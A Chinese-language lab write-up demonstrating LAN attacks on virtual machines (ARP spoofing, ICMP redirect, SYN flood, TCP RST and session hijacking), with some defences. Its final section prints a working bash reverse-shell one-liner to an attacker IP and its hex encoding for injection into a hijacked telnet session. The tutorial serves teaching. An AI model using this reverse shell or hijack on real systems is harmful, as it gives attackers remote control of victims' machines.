ARP伪造攻击
在局域网中,当想要访问一台主机,但是只知道主机的ip,这时源主机就会在局域网中广播发送ARP包来学习目的主机的ip对应的mac地址
ARP伪造攻击就是第三方hacker主机在收到ARP广播包时,用ARP包中的请求ip连同自己的mac地址发送回去,这样最初发送ARP请求包的主机就会将hacker主机的mac地址当成请求ip对应的mac地址,这样就会基于这个假的mac地址就行流量发送,最终流量会通过hacker主机发送到目的主机,而这个过程对于源目主机时不透明的
攻击前的ARP表
实施攻击
攻击后的ARP表
开启攻击者kali的网卡转发功能vim /etc/sysctl.conf //编辑sysctl.conf net.ipv4.ip_forward = 1 //设置为1 sysctl -p /etc/sysctl.conf //立即生效不需要重启 cat /proc/sys/net/ipv4/ip_forward //查看值是否为1,为1表示修改完成,为0表示没有修改
开启了网卡转发受害主机发送到目标主机的数据包回经过攻击者主机转发出去,这样攻击者就获得了受
害主机的通讯数据抓包
正常没有ARP欺骗时,在hacker端抓取不到流量
实施了ARP欺骗后,在hacker端可以抓取到icmp重定向的流量
ARP防御
- 主机中手动建立静态ARP表
- 主机中用ARP防火墙来固化ARP表
- 交换机中启用DAI技术(动态ARP检测技术)
DAI交换机会主动记录主机的ARP信息,来获得主机的ip、mac、vlan、接口的绑定信息,然后会根据这些绑定的信息来查看主机发出ARP的信息与绑定信息是否吻合;吻合就放行,不吻合就丢弃或者关闭该接口
arp没有认证机制DAI相当于做了一套认证机制来防御arp攻击
ICMP重定向防御
一般情况下现有网络的设计是很少发出重定向,那么我们可以禁止网关发出重定向消息,主机不处理重定向。
ICMP重定向攻击
ICMP重定向报文是ICMP控制报文中的一种。在特定的情况下,当路由器检测到一台机器使用非优化路由的时候,它会向该主机发送一个ICMP重定向报文,请求主机改变路由。路由器也会把初始数据向它的目的地转发
ICMP重定向攻击是同一广播域分hacker主机,它通过伪装发送主机的网关,向主机发送ICMP重定向报文,重定向地址指向自己,那么发送主机的流量会根据伪装的重定向报文被重定向到hacker主机进行中转,这样hacker主机就可以对流量进行一系列操作,但是这个过程对于源目主机是不透明的
在这里我用两台虚拟机进行演示,一台为hacker主机,一台为访问外网的被攻击主机
hacker主机的ip为10.211.55.9
被攻击主机的ip为10.211.55.14
正常未攻击时,被攻击主机访问外网,在hacker主机抓包查看
开始攻击
hacker攻击被攻击主机后,在hacker主机抓包查看
ICMP不可达攻击
ICMP不可达攻击是指icmp重定向后的地址是个被攻击主机不可达的地址
未攻击前,被攻击主机访问外网
开始攻击
攻击后,被攻击主机访问外网
出现成功返回延时以及不可达的两种情况,可能是攻击强度不够,但是也可以验证攻击起作用了
ICMP不可达攻击防御
增加服务断开的判断机制,做多重判断,不能仅从icmp不可达来判断失去连接从而断开服务。
TCP syn攻击
正常的TCP建立会经历三次握手过程
首先客户端会给服务端发送syn,接着服务端会向客户端发送syn+ack
正常情况下,客户端应该给服务端发送ack TCP建立就完成了
TCP syn攻击是指客户端给服务端发送了大量的TCP syn请求,但是并不进行最后的ack确认;这样大量的syn会存放在服务端给开辟的缓存表中,当缓存表被syn填满之后,正常的TCP连接请求就因为缓存表满了而无法进行
这里我用三台虚拟机进行测试,一台为攻击主机,一台为客户端,一台为服务端
为了产生TCP连接过程,在这里我使用telnet这个协议来产生TCP连接;让服务端telnet客户端
开始攻击
攻击效果
服务端telnet客户端的命令行界面卡死了
这个技术被防火墙用来拒绝用户访问某些受限制的网站
TCP rst攻击
正常的服务端和客户端的TCP连接可以通过发送TCP rst来重置TCP连接,这样就会使得TCP连接直接断开
TCP rst攻击就是利用了这一点
同局域网的hacker设备通过伪装成服务端向受害主机发送复位报文,当受害主机收到服务器发出的复位报文就会立即释放连接并清空缓存
正常情况下,即未攻击时
设备均处于在线状态
开始攻击
查看效果
攻击后client端直接挂了,服务端的telnet也断开了
TCP劫持攻击
hacker抓取包,了解到server与client之间的会话内容;然后伪造TCP包,伪造的包中二层的源Mac是hacker机,三层的源ip是client的ip 目标ip是server的ip,server判断会话只能通过三四层的信息
首先server端telnet连接到client端,通过wireshark进行抓包
开始攻击
查看结果
server端已经卡死 说明劫持成功,我的16进制转换代码内容为mkdir tcp;在client上发现创建tcp成功
TCP 反弹shell
如上图,一般只有server会通过nat将服务端口映射到公网,而给server提供数据支撑的数据server却并没有映射到公网,只存在于私网中,那么hacker无法通过网络触及到私网中的数据server;这时hacker会先通过监听server与数据server的tcp会话,然后给数据server注入一个反弹shell,这个反弹shell可以使得数据server从私网出去主动连接hacker
开启两个kali的ssh会话,一个用于监听端口,一个用于攻击受害主机
攻击代码:
bash -i>&/dev/tcp/10.211.55.9/8888 0>&1
转换后的16进制
62617368202d693e262f6465762f7463702f31302e3231312e35352e392f3838383820303e26310d00
先获取会话包
开始攻击
查看结果
client主动连接上了kali,这时就可以为所欲为了
